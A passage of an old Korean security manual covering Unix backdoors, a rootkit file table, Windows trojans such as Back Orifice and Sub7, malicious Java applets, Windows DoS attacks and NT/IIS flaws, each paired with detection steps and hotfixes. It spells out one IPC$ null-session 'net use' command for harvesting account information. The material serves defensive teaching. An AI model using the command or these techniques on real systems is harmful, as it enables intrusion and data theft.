lostlog로부터특정엔트리를제거한다. ㅇ Es - sun4 기반커널들의이더넷스니퍼ㅇ Fix - 체크섬값을가장하는도구ㅇ Sl - 매직패스워드를통하여관리자로로그인하는도구

82 네트워크트래픽백도어 (Network traffic backdoors) 침입자들은시스템에서자신들의흔적을숨기려고할뿐더러가능하면자신들의네트워크트래픽까지숨기기를원한다. 이러한네트워크트래픽백도어들은간혹침입차단시스템 (firewall) 을거쳐서침입할수있는것들도있다. 많은네트워크백도어들은일반적으로사용하지않는네트워크포트를사용하여시스템에침입하므로관리자들이침입자의트래픽을간과하기쉽다. TCP 쉘백도어침입자는침입차단시스템이막지않는높은 TCP 포트에 TCP 쉘백도어들을설치할수있다. 관리자들은 netstat를통해서어느포트들이연결을기다리고있고, 어느포트가연결되어있는지를점검할수있다. 이러한백도어들은 SMTP 포트상에서구동될수도있어, 을허용하는침입차단시스템을통과할수있다. UDP 쉘백도어관리자들이 TCP 연결에대해서는관리를잘하고이상한행위를알아차리기가쉽지만, UDP 쉘백도어는유닉스시스템에접속한상태를 netstat 등으로알기가쉽지않다. 많은침입차단시스템에서 DNS 서비스등을위해 UDP 패킷들을허락하도록설정되어있어침입자는 UDP 백도어를설치하여침입차단시스템을무사히통과할수있다. ICMP 쉘백도어 Ping은 ICMP 패킷을보내고받음으로써시스템이살아있는지확인하는가장일반적인방법이다. 많은침입차단시스템들이의부로부터내부시스템에대한 ping을허락한다. 침입자는 ping ICMP 패킷에데이터를추가하여 ping을하고있는시스템과쉘을제공받을수있도록한다. 시스템관리자는다량의 ping 패킷들을발견하겠지만패킷속의데이터를보지않는이상침입사실을알수없다

83 암호화된링크관리자가스니퍼를설치하여쉘에접근하려는사람을찾으려고할수있다. 하지만침입자는네트워크트래픽백도어를암호화하여실제두시스템간에어떤데이터가전송되고있는지를숨긴다. Windows NT Windows NT는유닉스시스템처럼단일시스템에다수사용자들을접속하도록허락하지않는다. 이는침입자가 Windows NT 시스템에침입하여백도어를설치하고시스템을공격하는것을어렵게한다. 하지만 Windows NT가다수사용자기술이발달됨에따라 Windows NT 시스템에대한공격사례가늘어나고있다. 요즘 Windows NT를위한 telnet 데몬이이미나와있고, 네트워크트래픽백도어를 Windows NT 시스템에설치하는것이쉬워졌다. 라. 루트킷 (RootKit) 루트킷은시스템침입후침입사실을숨기거나, 차후의침입을위한백도어등각종트로이목마프로그램의모음으로리눅스와 SUN 시스템에이러한루트킷이발견되고있으며, 지난 '98년 11월기능이보강된리눅스루트킷버전 4가발표되었다. 리눅스루트킷버전 4.0의기능은다음표와같다

84 [ 표 3-16] 트로이목마와뒷문프로그램 분류주요파일기능비고 원격접근 내부사용흔적삭제 관리자권한획득 기타 trojaned login trojaned inetd trojaned rshd trojaned tcpd trojaned crontab 매직패스워드사용, 로긴후로그를안남김외부에서숨겨진포트에접속허용매직패스워드사용, 로긴후로그를안남김특정 IP에대해무조건접근허가 crontab에백도어데몬심음 trojaned ps, top 특정프로세스의정보를숨김 trojaned pidof 특정프로세스의정보를숨김 버전4.0 에업데이트 trojaned ifconfig 스니퍼링탐지를방해 trojaned netstat 특정 IP의접속정보숨김 trojaned ls 특정파일이나디렉토리숨김 trojaned du 특정파일이나디렉토리숨김 trojaned find 특정파일이나디렉토리숨김 버전4.0 에업데이트 trojaned syslogd 특정로그내용숨김 wted wtmp/utmp 편집기 z2 특정사용자로그인정보삭제 trojaned shell trojaned chfn trojaned chsh trojaned passwd 부팅화일이나보안취약점을이용생성일반사용자가루트가되는백도어루틴내장일반사용자가루트가되는백도어루틴내장일반사용자가루트가되는백도어루틴내장 sniffchk 스니퍼동작상태점검 버전4.0 에업데이트 trojaned killall 특정프로세스를보호 버전4.0 에업데이트 라. 방지대책 시스템취약점점검 (Assessment) 첫번째단계로, 네트워크가얼마나취약한지를점검하여정정하여야하는보안허점들이어떤것들이있는지찾아낸다. 네트워크와시스템의취약성을스캐닝하는것을도와주는많은상업용도구들이있다. 시스템판매회사에서무료로제공하고있는보안패치를설치하는것만으로도시스템의보안을상당히향상시킬수있다

85 무결성점검시스템스캐너의필수컴포넌트중의하나가 MD5 체크섬기준선이다. MD5 기준선은해커가시스템을공격하기전에만들어져야한다. 일단해커가침입하여백도어를설치한후에 MD5 기준선을생성하면백도어프로그램도이 MD5 기준선에포함되어버린다. 시스템관리자가해커의침입흔적을발견하여시스템의백업을이용하여다시설치함으로써백도어를제거하려고하지만, 이미백업된파일들중에백도어가포함되어있을수있다. 따라서, 이러한 MD5에의한시스템무결성검사의기준선은반드시시스템이해킹당하기전에미리받아놓아야한다. 무결성점검을위해많이사용되고있는도구중의하나가 tripwire 이다. tripwire는불법적으로변경된파일에대한점검을위해 MD5, snefru 등다양한무결성점검알고리즘을제공한다. tripwite의동작개요는다음그림과같다. ( 그림 3-2) tripwire 동작개념 1 설정파일인 tw.config 파일에등록된파일및디렉토리의해쉬값생성. 2 DB로부터이전에생성된각파일및디렉토리의해쉬값과비교. 3 비교시 tw.config의 select-maskes를참조. 4 비교결과값이다를경우경고메시지출력

86 침입탐지 (Intrusion detection) 침입탐지는시스템에대한접속을통제하는것처럼중요하게되었다. 예전의대부분의침입탐지기술들은로그를기반으로하는이벤트들이었다. 최근의침입탐지기술은실시간스니핑과네트워크트래픽보안분석에기반으로하고있다. 많은네트워크트래픽백도어들은이제쉽게탐지되어진다. 최근의침입탐지시스템기술은 DNS UDP 패킷을조사해서 DNS 프로토콜의요청에일치하는지를판별한다. 만약 DNS 포트의데이터가 DNS 프로토콜과일치하지않는다면주의경보를알리고데이터를가로채서좀더면밀히분석한다. ICMP 패킷의데이터도똑같이적용되어실제정상적인 ping 데이터인지아니면암호화된쉘세션을가지고있는지를조사하게된다. CD-ROM으로부터의부팅관리자들은침입자가설치한백도어의가능성을줄이기위해 CD-ROM으로부터부팅하는것을고려하고있다. 이방법은전체기업에대해적용하기에는시간과비용이많이든다는단점이있다. 기타보안분야가빠르게변하고있기때문에새로운취약성들이매일보고되고있고침입자들이새로운공격기술과백도어기술을만들어가고있기때문에어떠한보안기술도항상신경을쓰지않고는효과적이지못하다. 5. 윈도우시스템해킹과대책최근유닉스서버뿐만아니라네트워크에연결된개인사용자의 PC를대상으로하는해킹기법이증가하고있어개인정보유출등에대한우려가높아지고있다. 특히백오러피스등의트로이잔호스공격을이용한공격은일반사용자에게그공격방법이많이알려져있어누구나쉽게이용할수있는실정이며, 실제로 PC방및개인사용자로부터백오러피스관련해킹사고가많이접수되고있다. 또한최근의바이러스는네트워크형바이러스로전자메일등을이용하여유포되고있으며감염시사용자의중요개인정보를유출하게된다

87 본고에서는앞서설명한공격방법을포함한여러종류의윈도우시스템과관련된해킹방법과개인사용자가취할수있는대응방법에대하여알아본다. 가. 트로이목마프로그램및대책 (1) 개요트로이목마프로그램이란어떤불법적행위를시도하기위하여, 합법적인프로그램으로위장하거나실행코드형태로다른프로그램의내부에존재하는프로그램으로사용자가부주의하게트로이목마프로그램을설치하게되면큰피해를입을수있다. 이러한트로이목마프로그램은차후뒷문프로그램 (Backdoor : 비인가된프로그램이나시스템에접근할수있도록조치를취하는프로그램 ) 을설치하게된다. 이렇게뒷문프로그램을설치하게되면공격자는시스템전체를제어할수있어개인정보유출등의공격을수행할수있다. 최근이러한원도우용트로이목마프로그램들은 100여가지가넘게발견되고있으며, 기능의확장과사용의편리성으로계속적으로피해가증가하고있는추세이다. 최근많이사용되고있는트로이목마프로그램들로는 Back Orifice, NetBus, Deep Throat, Sub7 등이있으며, 이러한프로그램들은새로운버전이출시되어피해가확산될것으로보인다. (2) 최근원도우트로이목마프로그램 백오리피스백오러피스는 CDC(Cult of the Dead Cow) 라는해킹그룹의 Sir Dystic이만든 MS WIN 95/98용프로그램으로 ' 세계적인해커회의인 DEFCON으로널리알려지게되었다. 클라이언트 / 서버모델로설계되었으며원격공격자는해당 Back Orifice 백도어서버를공격대상시스템에설치해야하고공격자호스트에클라이언트프로그램을설치해야한다. 클라이언트측에서는서버의이러한기능을이용하여파일시스템의모든파일들에대하여접근이가능하고, 프로세스의생성 / 삭제도원격으로조정된다. 그리고시스템패스워드유출, 키보드모니터링, 사용자의현재화면캡쳐도가능하고네트워크자원의공유지정, 네트워크접속재지정, 파일조작, 레지스트리조작도가능하다

이외에도여러가지기능을이용하여원격사용자는마치자신의시스템처럼사용할수있다. 다음그림은백오러피스클라이언트프로그램으로공격자가이프로그램을이용하여공격하고자하는시스템의백오러피스서버로연결을할수있다. 백오러피스서버가설치된호스트의 IP( 그림에서 xxx.

88 이외에도여러가지기능을이용하여원격사용자는마치자신의시스템처럼사용할수있다. 다음그림은백오러피스클라이언트프로그램으로공격자가이프로그램을이용하여공격하고자하는시스템의백오러피스서버로연결을할수있다. 백오러피스서버가설치된호스트의 IP( 그림에서 xxx.xxx.xxx.xxx로표현 ) 를이용하여서버에접근하고 command 창에서여러가지의명령을서버에게보낼수있다. ( 그림 3-3) 백오리피스메인화면 위의그림에서는 HTTP Enable" 명령을백오러피스서버가설치된호스트로보내웹서버를실행시키는모습이다. 이후공격자는자신의 PC에서웹브라우저를이용하여해당호스트의 C:\ 디렉토리내용을검색하고원하는파일을클릭하여파일을유출할수있다

89 ( 그림 3-4) 백오리피스를이용한파일유출 백오러피스를탐지하고제거하기위한방법으로는수동으로하는방법과자동으로탐지및제거해주는도구를사용하는방법이있다. 백오러피스는일반적으로 포트를사용하므로 netstat" 명령을이용하여자신의 PC에서 31337번포트가열려있는지확인함으로서백오러피스서버가설치되어있는지확인할수있다. ( 그림 3-5) 백오리피스설치확인

$또한백오러피스서버가설치될경우 c:\windows\system 아래에 windll.dll이란이름의파일과 c:\windows\system 아래에.exe" 이름의파일이생성되므로이를확인하여탐지할수있다. 또다른방법으로는레지스트리편집기명령인 regedit" 명령을실행하여다음위치의값이 Blank 값이아닌다른값이들어있는것을확인함으로서백오러피스가설치되어있음을확인할수있다.$

90 또한백오러피스서버가설치될경우 c:\windows\system 아래에 windll.dll이란이름의파일과 c:\windows\system 아래에.exe" 이름의파일이생성되므로이를확인하여탐지할수있다. 또다른방법으로는레지스트리편집기명령인 regedit" 명령을실행하여다음위치의값이 Blank 값이아닌다른값이들어있는것을확인함으로서백오러피스가설치되어있음을확인할수있다. ( 그림 3-6) 레지트리편집기에서확인된백오리피스 Deep Throat Deep Throat 3.0은 DarkLIGHT Corp에서공개한프로그램으로빠른업그레이드와기능향상을위해피드백을실시하는기능이있다. 또한 Deep Throat는사용하기편한 GUI를취하고있으며모든명령을버튼식으로구성하였고, 각버튼에해당하는설명을화면에출력하여별다른설명서없이도누구나쉽게사용할수있다. 이프로그램의목적이가장대중적인해킹도구가되는것이라밝히고있다. 다음은 Deep Throat의초기화면이다

91 ( 그림 3-7) Deep Throat 초기화면 NetBus 1.70 NetBus Pro는원격관리및스파이프로그램으로설치가매우용이하며, 사용하기쉬운인터페이스를가지고있다. File manager, Registry managerem, Application Redirect 등과같은원격관리기능과더불어화면켑쳐, 키보드켑쳐등과같은스파이기능을제공한다. 공격자는 NetBus 클라이언트프로그램을이용하여 NetBus 서버가설치된호스트에접속한다음클라이언트프로그램의다양한명령버튼을이용하여여러가지작업을수행할수있는데 ( 그림 3-8) Netbus 다운로드화면

92 Sub 7 Sub 7은일반관리와스파이기능과더불어 ICQ, IRC, E-mai1 통지기능이있어검색을하지않고도감염컴퓨터의상태를확인할수있다. 또한클라이언트프로그램의설정이가능하여자신에게맞게설정하여사용할수있다는장점을가지고있다. ( 그림 3-9) Sub 7 초기화면 Keylogger Keylogger는사용자의 Keylog를가로채는트로이목마프로그램으로이기능은위에서살펴본통합된형태의트로이목마프로그램들에서가장악의적인목적으로많이사용된다. 최근 EcoKys라는트로이목마프로그램을이용해서남의통장에서현금을인출해간 20대가경찰에잡힌사건이있었다. 이 EcoKys라는프로그램은 Keylogger 프로그램과이프로그램을시스템에자동으로설치해주는 Dropper/EcoKys를합쳐서만든프로그램으로계속적인피해가발생되고있다

93 (3) 근윈도우트로이목마프로그램대책 탐지기구 Toilet Paper와같은특정트로이목마탐지도구를비롯하여여러가지종류의트로이목마프로그램을탐지해주는공개용프로그램이인터넷에공개되고있어이를이용하여트로이목마프로그램이설치되어있는지탐지할수있다. 다음은백오러피스및백오러피스2000을탐지할수있는도구로아래의사이트에서다운로드하여실행시키기만하면된다. ( 그림 3-10) 백오리피스전용탐지도구 ( 그림 3-11) 백오리피스 2000 전용탐지도구 로드사이트 : html?id=

94 다음은수십개의트로이목마프로그램을탐지할수있는탐지도구 (The Cleaner) 로서실행을시킨뒤검색하고자하는드라이브를선택하고 Scan" 버튼을누르면트로이목마프로그램을탐색한다. ( 그림 3-12) 트로이목마탐색도구화면 (1) ( 그림 3-13) 트로이목마탐색도구화면 (2) (4) 사용자대책원도우용트로이목마프로그램으로부터의피해를입지않기위해서는다음과같은주의가필요하다

95 ㅇ트로이목마프로그램에대한사용자들의인식ㅇ통신망, 인터넷을통한파일다운로드주의ㅇ출처가불분명한메일첨부물실행주의ㅇ정품소프트웨어사용ㅇ최신백신소프트웨어사용 ( 실시간감시기사용 ) ㅇ주기적인악성프로그램검사및제거ㅇ네트워크모니터링을통한침입감시 (netstat -a를이용한감시 ) 나. 악성코드및대책 (1) 개요최근원도우사용자들의보안위협중가장일반적인피해는악성코드에의한것이다. 인터넷인구의증가와자바프로그램의대중화와함께새롭게출현한공격인자바애플릿, 자바스크립트, Active X 등의이동성악성코드에의한위협과함께오래전부터존재하고있던컴퓨터바이러스라는악성코드의위협이최근에는빠른전파력과파괴적인증상, 그리고다양한공격성으로인하여그피해가더욱증가하고있다. (2) 자바애플릿및자바스크립트공격월드와이드웹 (WWW) 에서의다양한표현과높은기능성을제공하기위하여자바스크립트와자바애플릿이가장많이사용되고있다. 그러나이자바스크립트와자바애플릿이악의적으로작성되었을경우에는사용자시스템에유해한동작을유발시킬수있는위협이존재하게된다. 다음은악성자바스크립트와자바애플릿의대표적인공격유형들이다. Window Spawner(Exploding Windows) Window를계속적으로생성시키는악성애플릿공격으로클라이언트시스템자원을모두고갈시켜시스템의다운시키거나사용을방해하는공격이다

96 ( 그림 3-14) Window Spawner 공격 Java Applet Killer 한계값이상의변수를자바메소드에보냄으로써윈도우시스템을다운시키는악성자바애플릿으로윈도우 NT 시스템과윈도우 95/98의모든시스템을공격할수있다. 이악성애플릿의 crash-mechanism은클라이언트시스템의웹브라우저에독립적으로공격이가능하기때문에 Netscape ver 2.0, 3.0, 4.0과 Internet Explorer ver 3.0, 4.0, 5.0 등에서모두공격이가능하다. ( 그림 3-15) Java Applrt Killer

IE4 Cuartango 스페인의웹개발자인 Juan Carlos G. Cuartango가발견한보안취약점으로웹페이지상의간단한자바스크립트를이용하여사용자의하드디스크에서임의의파일을유출할수있다. 이취약점을이용한공격을위해서는유출대상파일의정확한위치와이름을알아야만하는데, 사용자들의주요한파일들이대부분특정위치에있는경우가많다.

97 IE4 Cuartango 스페인의웹개발자인 Juan Carlos G. Cuartango가발견한보안취약점으로웹페이지상의간단한자바스크립트를이용하여사용자의하드디스크에서임의의파일을유출할수있다. 이취약점을이용한공격을위해서는유출대상파일의정확한위치와이름을알아야만하는데, 사용자들의주요한파일들이대부분특정위치에있는경우가많다. 경품추천등으로가장한공격자의사이트에서조작된 mail to" 클릭하게되면 Outlook 98 메일이화면에떠서메일을보낼수있는창이나타난다. 사용자는무심코버튼을클릭하게되면, 의도하지않은시스템의중요파일이첨부되어전송되게된다. ( 대책 : 참조 ) ( 그림 3-16) 전자메일을통한자료유출 frame spoofing Netscape Communicator와 IE에서다른웹사이트의윈도우프레임에악의적인자바스크립트를통하여다른공격자웹사이트의컨텐트를삽입할수있도록한다. 공격자는적법한웹사이트에이러한가짜프레임을삽입하여일반사용자의중요한정보를획득할수있다. 다음그림에서빨간색선으로표시된두번째프레임은뉴욕증권거래소에서제공하는윈도우가아닌다른싸이트에서제공되는프레임이다

98 ( 그림 3-17) Frame Spoofing 공격화면 (3) 악성코드대책악성코드의대책도앞에서제시한윈도우트로이목마프로그램의대책에서와같이사용자의주의와관심이가장중요할것이다. 악성코드대책은자바대책과컴퓨터바이러스대책으로나누어살펴보기로하겠다. ( 그림 3-18) Netscape Web Browser 보안설정

네스케이프웹브라우저의경우, 그림과같이 Enable Java & Enable Java Script 설정을자신의시스템사용목적에적당하도록지정하여사용한다. ( 그림 3-19) Internet Explorer Web Browser 보안설정 Internet Explorer 웹브라우저의경우, 그림과같이높은보안수준을설정하여야한다.

99 네스케이프웹브라우저의경우, 그림과같이 Enable Java & Enable Java Script 설정을자신의시스템사용목적에적당하도록지정하여사용한다. ( 그림 3-19) Internet Explorer Web Browser 보안설정 Internet Explorer 웹브라우저의경우, 그림과같이높은보안수준을설정하여야한다. 악성자바스크립트와자바애플릿의보안대책은다음과같이정리해볼수있다. ㅇ웹사이트를방문장소파악할것 ( 인증되지않은사이트방문자제 ) ㅇ사용하고있는자바환경설정을정확히파악할것ㅇ취약성이해결된최신버전의웹브라우저를사용할것ㅇ보안경고 (security alert) 에항상관심을가지고있을것ㅇ중요한정보를보유하고있다면강력한악성코드보안정책사용할것 최근의윔바이러스들이 과 IRC를통한두가지자체전파기능을포함하기때문에사용자들은두가지방법으로감염을방지하는방법을나누어볼수있을것이다. 첫째는최근의웜바이러스들이기본적인확산방법으로감염파일을첨부한 을사용자에게보내는방법을사용하므로사용자는보내는이가확실하지않은 의첨부파일은조심해야하며이러한 E-mai1은바로삭제하는것이좋을것이다

100 둘째는 IRC Channel을통한자체전파기능에대해서는최신의 mirc와같은 IRC 클라이언트프로그램의경우이런웜바이러스를막기위한설정이되어있으므로최신의프로그램을사용하여확산을막을수있을것이다. 그림과같이최신 mirc v5.61의경우기본설정이 Show get Dialog로되어있기때문에 IRC Channel을통해웜바이러스가오면 Dialog를통해확인절차를거치게되므로감염을막을수있다. 하지만본문에서도제시되었던것처럼최신의 IRC를통한웜바이러스는이러한설정기능도바꿀수있는기능을포함하고있기때문에주의가필요하다. ( 그림 3-20) mlrc 의웜바이러스방지설정 다. 서비스거부공격및대책 (1) 개요서비스거부공격 (Denial Of Service) 은특정서버또는시스템자체가서비스를하지못하도록하는공격으로네트워크트래픽을폭증시키거나시스템의 CPU를소모하도록하여속도를저하시키거나또는특정위조된패킷을보내시스템또는특정서버를정지시키는공격방법이있다. 대부분의경우공격자의소스주소를속여서공격을하기때문에공격자를역추적하기가어려우며, 탐지하기도쉽지않다

101 (2) 윈도우시스템의서비스거부공격 Out Of Band OOB 데이터는연결이설정된스트림에서일반적인데이터에비해높은우선권을부여받아전송되는데이터로서보통예외적인상황이발생하였음을통보하기위해사용된다. 이때 TCP/IP 헤더의 URGENT 비트로 OOB 데이터임을표시한다. 그러나윈도우시스템들이 OOB 데이터를적절히처리하도록구현되어위조된 OOB 데이터를보낼경우, 시스템이정지하게된다. 보통다음그림과같은 nuke" 라는이름의많은공격프로그램이인터넷에공개되어있으며 Win95, NT 시스템에적용된다. ( 그림 3-21) nuke 공격프로그램 다음프로그램은공격하고자하는대상의범위를줄수있도록되어있어하나의기관의모든 Win95 및 NT 시스템을정지시킬수있다. ( 그림 3-22) WinGenocide 프로그램

102 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winn/winnt-public/fixes/kor/nt40 /hotfixes-postsp3/oob-fix/ - Snork 서비스거부공격소스주소를조작하여 UDP 패킷을 NT 서버의 RPC 포트 (135) 로보내공격대상시스템의 CPU 사용도를 5에서 120초동안 100% 까지끌어올릴수있는공격이다. 또한네트워크상의모든 NT 시스템간에패킷을주고받도록하여네트워크의부하를증가시키는공격을수행할수있다. ( 대책 : 참조 ) SMB/CIFS 서비스거부공격 NT는네트워크파일공유및기타통신을위하여 SMB. CIFS 프로토콜을사용하는데 SMB 로그온요청을보낼때, 패킷처리를적절히하지못하여메모리가오염되게되고따라서파란스크린이보이고재부팅하게된다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winn/winnt-public/fixes/kor/nt40 /hotfixes-postsp3/srv-fix Teardrop/Teardrop2 teardrop은두개의 UDP 패킷조각을이용하는데두번째패킷조각의오프셋을조작하여패킷조각을재조합하는과정에서버퍼를넘쳐쓰게함으로써시스템을중지시키는공격이고, Teardrop2는 UDP 패킷을구성하는두개의패킷조각중두번째패킷조각의오프셋을이전패킷조각의 UDP 헤더위치로설정하여이패킷조각의내용이이전패킷조각의 UDP 헤더의내용을덮어쓰게하여윈도우시스템이불완전한 UDP 패킷을생성하도록유도한다. 이때윈도우시스템은각각의불완전한 UDP 패킷에대해커널메모리를할당하기때문에충분한양의패킷을전송하는경우, 윈도우시스템의속도가현저히저하되거나시스템이중단된다

103 대책 : 참조 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/kor/nt40/ hotfixes-postsp3/teardrop2-fix/ Ping of Death RFC-791 "Internet Protocol" 따르면헤더를포함한 IP 패킷의최대길이는 65,535( 즉 / 2^16-1) 까지로제한되어있다. 따라서실제로많은시스템의 IP 패킷을처리하는코드는이같은최대길이를가정하여구현되어있다. 또한대부분의시스템이규정길이보다큰패킷을전송할수없도록구현되어있다. 그러나특히윈도우시스템을포함한일부시스템에서는이같은제한이구현되지않아규정된길이이상의 IP 패킷을전송할수있다. 이경우, 최대길이를가정하여구현된시스템들은 IP 패킷처리코드의버퍼가오버플로우되어결과적으로시스템의재부팅, 중단등을포함한여러시스템문제가발생한다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winn/winnt-public/fixes/kor/nt40 /hotfixes-postsp3/icmp-fix/ - pimp Win98 시스템이 IGMP 패킷을적절히처리하지못하여발생하는취약점으로공격자가위조된 IGMP 패킷을보낼경우 Win98 시스템의네트워크서비스가정지하거나시스템이재부팅되는현상이발생한다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winn/winnt-public/fixes/kor/nt40/hotfixes-postsp5/ igmp-fix 라. 윈도우 NT 보안취약점및대책 (1) 개요윈도우NT는최근들어사용자에게친숙하고경쟁력있는가격으로인하여사용이급증하고있으며, 개인및여러기관에서중요한시스템으로자리잡아가고있다

104 특히사내인트라넷구축이나, 개인웹서버구축시윈도우NT를많이사용하고있다. 윈도우NT의사용이증가함에따라보안취약점들이많이발견되고있으며, 또한이를이용한보안침해사고가발생하고있으며, 최근국내에서도윈도우NT 관련보안사고가크게증가하고있다. 현재윈도우NT 관련보안취약점은증가추세에있으며네트워크를이용한공격도많이발견되고있어해킹공격을통한개인정보유출등의위협이커지고있다. 윈도우NT의보안취약점은시스템에접근권한을갖고있는일반사용자가이용할수있는시스템관련취약점, IIS 및 RAS 등각종서버및응용프로그램의취약점, NETBIOS, SMB 등과같은프로토콜관련취약점등으로구분할수있다. 다음은윈도우NT 시스템해킹에자주이용되는방법에그에대한대책을설명한다. (2) 패스워드크래킹패스워크크래킹은가장전통적인해킹기법으로단어사전을이용하거나글자를배합시켜사용자의패스워드를알아내는방법이다. NT 시스템의경우 NetBIOS가제공하는정보와 IPC$ 공유의취약점을이용하여사용자계정이름을쉽게알아낼수있어패스워드크래킹공격에특히취약하다. ㅇ IPC$ 공유 : 서버간에필요한정보를통신하기위해사용되는공유이지만, 공격자가패스워드없이 IPC$ 공유에접속하여사용자계정정보, 보안정책, 네트워크공유등다양한정보수집가능 c:\>net use\\[ip addr of target machine]\ipc$"" /user:"" NT 시스템의패스워드크래킹공격도구로는 NAT, IPC$Crack 등의공개프로그램이있다. 다음은 NAT 프로그램을이용하여패스워드를추측하는공격장면을보여준다

105 특히, 99년초에 L0pht 해커그룹이제작한 NT 전용패스워드크래킹프로그램은평균 90% 이상의패스워드를해독할수있어많은해커에의해사용되고있다. 시스템관리자및보안전문가또한자신들의패스워드강도를테스트하기위해사용하고있어공격도구인동시에방어도구로서사용된다. 다음은프로그램의실행화면이다. 이러한공격을막기위해서는패스워드선택시알파벳, 숫자, 특수문자를섞어추측하기어려운패스워드를만들어야한다.( 다운로드사이트 : (3) IIS 관련취약점 MS사가무료로제공하는웹서버인 Internet Information Server" 에서많은보안문제점이발견되고있으며, 홈페이지해킹사고원인을제공하고있다

IIS Proxied Password Attack IIS 4.0 설치시기본적으로 /IISADMPWD라는가상디렉토리를생성하는데, 이디렉토리에는웹서버를통하여패스워드를변경시켜주는기능등을하는.HTR 파일이존재한다. 하지만일반 anonymous 사용자가이러한파일에접근할수있어원격지에서해당시스템이나다른원격지의 NT 시스템의패스워드에대한공격을할수있다.

106 IIS Proxied Password Attack IIS 4.0 설치시기본적으로 /IISADMPWD라는가상디렉토리를생성하는데, 이디렉토리에는웹서버를통하여패스워드를변경시켜주는기능등을하는.HTR 파일이존재한다. 하지만일반 anonymous 사용자가이러한파일에접근할수있어원격지에서해당시스템이나다른원격지의 NT 시스템의패스워드에대한공격을할수있다. 대책은이기능들이필요하지않을경우 /IISADMPWD를제거, 가상디렉토리의이름변경 Malformed "GET" URL GET" 문장과오류가있는데이터를포함한조작된 URL을이용하여 IIS서비스의모든자원을소모하여서비스를마비시킬수있다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/kor/security/lnfget-fix/infget4i.exe IIS 4 Executable Directories 일반사용자가파일실행을허용하는웹사이트디렉토리에실행파일을올릴수있는경우사용자는해당실행파일을실행시켜웹사이트를공격할수있다. 일반적으로다음과같은디렉토리가디폴트로쓰기가능하다

대책 : 모든쓰기가능한가상 HTTP 서버디렉토리에대한접근권한을검사하고 Everyone 그룹을제거하도록한다. IIS ASP URL 경로중확장 URL 부분에. 가포함될경우, IIS가 ASP(Active Server Pages) 코드를실행시키는대신코드를보여주게된다. http://www.somesite.com/new.products/hello.

107 대책 : 모든쓰기가능한가상 HTTP 서버디렉토리에대한접근권한을검사하고 Everyone 그룹을제거하도록한다. IIS ASP URL 경로중확장 URL 부분에. 가포함될경우, IIS가 ASP(Active Server Pages) 코드를실행시키는대신코드를보여주게된다. 위에서 new.products" 부분때문에 hello.asp를실행시키는대신그내용을보여주게된다. 그리고이는 Everyone 그룹과 IUSR_MACHINENAME이읽기권한을갖는 NTFS 파티션일경우에만발생한다. 모든.ASP 파일을 scripts 디렉토리로옮기고읽기접근권한을제거한다. o 기타 ASP 취약점 : (4) 기타취약점 PPTP sniffer L0pht 해킹그룹에서 L0phtcrack 프로그램에 PPTP sniffer 프로그램을추가하여제공하고있다. 대책 : 참조 sechole.exe

108 메모리주소에서특정 API 콜을찾아내어수정함으로서 Debug 수준의접근권한을획득한다음현재로그인한사용자를관리자그룹에포함시킬수있는취약점이존재한다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes pptp 공격자가 PPTP 서버로가장하여사용자에게패스워드를바꾸도록하여사용자의패스워드 hash를획득할수있다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/kor/nt40/hotfixes-postsp3/ pptp3-fix/ Service Pack 4 Authentication Error 사용자가패스워드를변경할경우 NT hash와 LanManager hash값이 SAM 데이터베이스에업데이트된다. 하지만사용자가 DOS, Win3.1, WfW OS/2 등과같은예전의클라이언트를사용하여패스워드를바꿀경우 LanManager hash 값만저장되고 NT hash 값은널 (null) 값으로저장된다. 그리고 NT 시스템에서로그온이나네트워크공유자원을접근하려할때 Service Rack 4의오류로인하여널 NT hash 값이사용된다. 따라서 DOS나 Win3.1과같은클라이언트에서패스워드를바꾼경우, 공격자는 NT 시스템에서해당계정으로패스워드없이로그온이가능하다. 대책 : 참조 ScreenSaver Windows NT 시스템에서 Screen saver는 Winlogon.exe에의해서실행되며, Winlogon.exe는 screen saver의 primary security token을로그인한사용의 security token으로변환하고 screen saver 프로세스를실행하게된다

109 하지만 Winlogon.exe가이러한 security token의변환이성공했는지를검사하지않아, 만약실패할경우 screen saver는 Winlogon.exe의보안문맥인 system 문맥으로실행되고여러가지일을수행할수있게된다. 대책 : 핫픽스설치 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/kor/nt40/hotfixes-postsp4/scr nsav-fix/scrnsavi.exe - 참조 (5) 윈도우NT 보안대책보안취약점에대처하기위해서는지속적으로발견되는취약점을알아내고시스템을패치하고보완하는것이중요하다. 보다구체적인 NT 보안취약점에대한문제와대책은 MS사의웹사이트인 (KnowledgeBase) 들을검색하여얻을수있으며종합적인 NT의패치인 SP(Service Pack) 나부분적인보안패치인 hotfix의경우는 ftp.microsoft.com 사이트를참조하면된다. Service Pack Microsoft사는응용프로그램과운영체제의버그에대한수정본을위하여온라인데이터베이스를관리하고있다. 이러한수정본들을 Service Packs이라한다. 보안패치를포함하여가장최근의 Service Packs이최근의수정본들을포함하고있다. 아래의사이트에서다운로드받아실행만시키면설치가된다. o Service Pack 다운로드사이트 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz xxx : 국가, yyy : NT version, zzz : Service Pack 예 : 미국, NT 4.0, Service Pack 3의위치 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/ussp

110 Hot Fix Hot Fix는 Service Pack이발표되기전에나오는것으로보안문제를포함하여특정문제를해결하기위한것이다. 아래의사이트에서다운로드받아실행만시키면자동으로설치되고보안문제가해결된다. ㅇ Hot Fix 다운로드사이트 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz xxx : 국가, yyy : NT version, zzz : Hot Fix 디렉토리 예 : 미국, NT 4.0, Service Pack 3가설치된경우 Hot Fixes의위치 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-pdstsp

